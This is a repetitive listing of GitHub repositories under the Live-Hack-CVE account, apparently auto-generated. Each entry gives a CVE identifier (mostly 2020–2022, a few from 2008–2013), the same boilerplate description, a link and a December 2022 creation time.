**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35835 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35835](https://github.com/Live-Hack-CVE/CVE-2022-35835) create time: 2022-12-25T21:59:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36088 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36088](https://github.com/Live-Hack-CVE/CVE-2022-36088) create time: 2022-12-25T21:59:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26394 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26394](https://github.com/Live-Hack-CVE/CVE-2022-26394) create time: 2022-12-25T21:59:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34733 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34733](https://github.com/Live-Hack-CVE/CVE-2022-34733) create time: 2022-12-25T21:59:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36872 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36872](https://github.com/Live-Hack-CVE/CVE-2022-36872) create time: 2022-12-25T21:59:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36870 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36870](https://github.com/Live-Hack-CVE/CVE-2022-36870) create time: 2022-12-25T21:59:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36869 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36869](https://github.com/Live-Hack-CVE/CVE-2022-36869) create time: 2022-12-25T21:59:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36871 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36871](https://github.com/Live-Hack-CVE/CVE-2022-36871) create time: 2022-12-25T21:59:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36867 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36867](https://github.com/Live-Hack-CVE/CVE-2022-36867) create time: 2022-12-25T21:58:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34731 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34731](https://github.com/Live-Hack-CVE/CVE-2022-34731) create time: 2022-12-25T21:58:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37955 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37955](https://github.com/Live-Hack-CVE/CVE-2022-37955) create time: 2022-12-25T21:58:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37964 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37964](https://github.com/Live-Hack-CVE/CVE-2022-37964) create time: 2022-12-25T21:58:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35838 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35838](https://github.com/Live-Hack-CVE/CVE-2022-35838) create time: 2022-12-25T21:58:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35805 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35805](https://github.com/Live-Hack-CVE/CVE-2022-35805) create time: 2022-12-25T21:58:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34729 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34729](https://github.com/Live-Hack-CVE/CVE-2022-34729) create time: 2022-12-25T21:58:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37962 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37962](https://github.com/Live-Hack-CVE/CVE-2022-37962) create time: 2022-12-25T21:58:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34728 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34728](https://github.com/Live-Hack-CVE/CVE-2022-34728) create time: 2022-12-25T21:58:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34723 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34723](https://github.com/Live-Hack-CVE/CVE-2022-34723) create time: 2022-12-25T21:58:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37963 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37963](https://github.com/Live-Hack-CVE/CVE-2022-37963) create time: 2022-12-25T21:58:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35834 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35834](https://github.com/Live-Hack-CVE/CVE-2022-35834) create time: 2022-12-25T21:58:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34719 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34719](https://github.com/Live-Hack-CVE/CVE-2022-34719) create time: 2022-12-25T21:58:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37959 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37959](https://github.com/Live-Hack-CVE/CVE-2022-37959) create time: 2022-12-25T21:57:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35840 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35840](https://github.com/Live-Hack-CVE/CVE-2022-35840) create time: 2022-12-25T21:57:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39202 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39202](https://github.com/Live-Hack-CVE/CVE-2022-39202) create time: 2022-12-25T21:57:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37961 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37961](https://github.com/Live-Hack-CVE/CVE-2022-37961) create time: 2022-12-25T21:57:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38007 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38007](https://github.com/Live-Hack-CVE/CVE-2022-38007) create time: 2022-12-25T21:57:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2008-2364 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2008-2364](https://github.com/Live-Hack-CVE/CVE-2008-2364) create time: 2022-12-25T21:09:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2009-3094 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2009-3094](https://github.com/Live-Hack-CVE/CVE-2009-3094) create time: 2022-12-25T21:10:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2009-3095 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2009-3095](https://github.com/Live-Hack-CVE/CVE-2009-3095) create time: 2022-12-25T21:09:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2009-2699 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2009-2699](https://github.com/Live-Hack-CVE/CVE-2009-2699) create time: 2022-12-25T21:09:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2009-1891 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2009-1891](https://github.com/Live-Hack-CVE/CVE-2009-1891) create time: 2022-12-25T21:09:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2009-1890 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2009-1890](https://github.com/Live-Hack-CVE/CVE-2009-1890) create time: 2022-12-25T21:09:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-0434 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-0434](https://github.com/Live-Hack-CVE/CVE-2010-0434) create time: 2022-12-25T21:10:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2011-0419 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2011-0419](https://github.com/Live-Hack-CVE/CVE-2011-0419) create time: 2022-12-25T21:10:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2011-3192 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2011-3192](https://github.com/Live-Hack-CVE/CVE-2011-3192) create time: 2022-12-25T21:10:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2011-3348 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2011-3348](https://github.com/Live-Hack-CVE/CVE-2011-3348) create time: 2022-12-25T21:10:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-1950 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-1950](https://github.com/Live-Hack-CVE/CVE-2013-1950) create time: 2022-12-25T20:33:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23551 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23551](https://github.com/Live-Hack-CVE/CVE-2020-23551) create time: 2022-12-25T21:14:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23550 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23550](https://github.com/Live-Hack-CVE/CVE-2020-23550) create time: 2022-12-25T21:14:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23553 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23553](https://github.com/Live-Hack-CVE/CVE-2020-23553) create time: 2022-12-25T21:12:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23552 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23552](https://github.com/Live-Hack-CVE/CVE-2020-23552) create time: 2022-12-25T21:12:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23554 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23554](https://github.com/Live-Hack-CVE/CVE-2020-23554) create time: 2022-12-25T21:12:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23555 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23555](https://github.com/Live-Hack-CVE/CVE-2020-23555) create time: 2022-12-25T21:12:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23560 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23560](https://github.com/Live-Hack-CVE/CVE-2020-23560) create time: 2022-12-25T21:12:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23559 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23559](https://github.com/Live-Hack-CVE/CVE-2020-23559) create time: 2022-12-25T21:12:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23557 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23557](https://github.com/Live-Hack-CVE/CVE-2020-23557) create time: 2022-12-25T21:12:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23556 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23556](https://github.com/Live-Hack-CVE/CVE-2020-23556) create time: 2022-12-25T21:11:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23558 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23558](https://github.com/Live-Hack-CVE/CVE-2020-23558) create time: 2022-12-25T21:11:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-3452 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-3452](https://github.com/Live-Hack-CVE/CVE-2020-3452) create time: 2022-12-25T20:33:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-3427 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-3427](https://github.com/Live-Hack-CVE/CVE-2020-3427) create time: 2022-12-25T20:32:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36603 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36603](https://github.com/Live-Hack-CVE/CVE-2020-36603) create time: 2022-12-25T20:32:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9060 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9060](https://github.com/Live-Hack-CVE/CVE-2020-9060) create time: 2022-12-25T20:31:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9059 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9059](https://github.com/Live-Hack-CVE/CVE-2020-9059) create time: 2022-12-25T20:31:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8558 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8558](https://github.com/Live-Hack-CVE/CVE-2020-8558) create time: 2022-12-25T20:31:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8968 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8968](https://github.com/Live-Hack-CVE/CVE-2020-8968) create time: 2022-12-25T20:30:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8195 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8195](https://github.com/Live-Hack-CVE/CVE-2020-8195) create time: 2022-12-25T20:30:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8196 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8196](https://github.com/Live-Hack-CVE/CVE-2020-8196) create time: 2022-12-25T20:30:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8300 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8300](https://github.com/Live-Hack-CVE/CVE-2020-8300) create time: 2022-12-25T20:30:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35538 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35538](https://github.com/Live-Hack-CVE/CVE-2020-35538) create time: 2022-12-25T20:30:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8193 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8193](https://github.com/Live-Hack-CVE/CVE-2020-8193) create time: 2022-12-25T20:29:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36600 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36600](https://github.com/Live-Hack-CVE/CVE-2020-36600) create time: 2022-12-25T20:28:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36601 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36601](https://github.com/Live-Hack-CVE/CVE-2020-36601) create time: 2022-12-25T20:28:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46790 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46790](https://github.com/Live-Hack-CVE/CVE-2021-46790) create time: 2022-12-25T21:15:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23382 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23382](https://github.com/Live-Hack-CVE/CVE-2021-23382) create time: 2022-12-25T21:14:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4158 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4158](https://github.com/Live-Hack-CVE/CVE-2021-4158) create time: 2022-12-25T21:10:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25049 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25049](https://github.com/Live-Hack-CVE/CVE-2021-25049) create time: 2022-12-25T20:36:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46836 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46836](https://github.com/Live-Hack-CVE/CVE-2021-46836) create time: 2022-12-25T20:33:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40024 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40024](https://github.com/Live-Hack-CVE/CVE-2021-40024) create time: 2022-12-25T20:33:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1406 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1406](https://github.com/Live-Hack-CVE/CVE-2021-1406) create time: 2022-12-25T20:32:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1349 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1349](https://github.com/Live-Hack-CVE/CVE-2021-1349) create time: 2022-12-25T20:32:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1389 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1389](https://github.com/Live-Hack-CVE/CVE-2021-1389) create time: 2022-12-25T20:32:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1352 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1352](https://github.com/Live-Hack-CVE/CVE-2021-1352) create time: 2022-12-25T20:32:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1383 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1383](https://github.com/Live-Hack-CVE/CVE-2021-1383) create time: 2022-12-25T20:32:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40023 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40023](https://github.com/Live-Hack-CVE/CVE-2021-40023) create time: 2022-12-25T20:32:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1305 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1305](https://github.com/Live-Hack-CVE/CVE-2021-1305) create time: 2022-12-25T20:32:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1243 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1243](https://github.com/Live-Hack-CVE/CVE-2021-1243) create time: 2022-12-25T20:32:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1221 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1221](https://github.com/Live-Hack-CVE/CVE-2021-1221) create time: 2022-12-25T20:32:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1228 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1228](https://github.com/Live-Hack-CVE/CVE-2021-1228) create time: 2022-12-25T20:31:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1231 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1231](https://github.com/Live-Hack-CVE/CVE-2021-1231) create time: 2022-12-25T20:31:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1140 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1140](https://github.com/Live-Hack-CVE/CVE-2021-1140) create time: 2022-12-25T20:31:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1139 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1139](https://github.com/Live-Hack-CVE/CVE-2021-1139) create time: 2022-12-25T20:31:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1141 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1141](https://github.com/Live-Hack-CVE/CVE-2021-1141) create time: 2022-12-25T20:31:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1138 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1138](https://github.com/Live-Hack-CVE/CVE-2021-1138) create time: 2022-12-25T20:31:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0266 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0266](https://github.com/Live-Hack-CVE/CVE-2021-0266) create time: 2022-12-25T20:31:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0260 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0260](https://github.com/Live-Hack-CVE/CVE-2021-0260) create time: 2022-12-25T20:31:34Z

